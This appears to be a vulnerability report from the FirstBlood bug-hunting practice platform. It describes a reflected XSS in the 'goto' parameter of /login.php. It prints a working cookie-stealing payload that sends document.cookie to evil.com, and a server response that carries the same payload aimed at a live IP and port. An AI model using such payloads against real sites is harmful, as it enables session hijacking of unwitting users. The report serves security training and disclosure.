FirstBlood-#523POST-based rXSS on login.php
This issue was discovered on FirstBlood v2.0.0 (issues patched)



On 2021-10-26, 0x1452 Level 3 reported:

Hey!

I found another way to exploit the goto parameter on the /login.php endpoint.

It doesn't sanitize inputs with a javascript schema at all. This allows an attacker to craft a link that will cause XSS after the victim logs in.

To reproduce this navigate to /login.php?goto=javascript:document.location='http://evil.com?c='%2bdocument.cookie, then log in.

The application will now send a POST request to /login.php that results in the following response:

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Oct 2021 02:58:33 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Set-Cookie: drps=d81c914cb56b895ec86505141; expires=Sun, 31-Oct-2021 02:58:33 GMT; Max-Age=432000; path=/
Content-Length: 115

<script>top.location.href="javascript:document.location='http://159.223.18.143:41328?c='+document.cookie";</script>

The attacker can now extract your session cookie from their server logs:

P3 Medium

Endpoint: /login.php

Parameter: goto

Payload: javascript:document.location='http://evil.com?c='%2bdocument.cookie


FirstBlood ID: 39
Vulnerability Type: Reflective XSS

Our mistake: The parameter "goto" on login.php should of been "fixed" when redirecting to prevent XSS but due to an oversight from Sean and Karl, the new code did not make it into production. This has since updated since the event ended and you're recommended to re-try. It's related to bug ID 26 because the idea was developers fixed *this* one (when redirecting) but forgot the other reflection.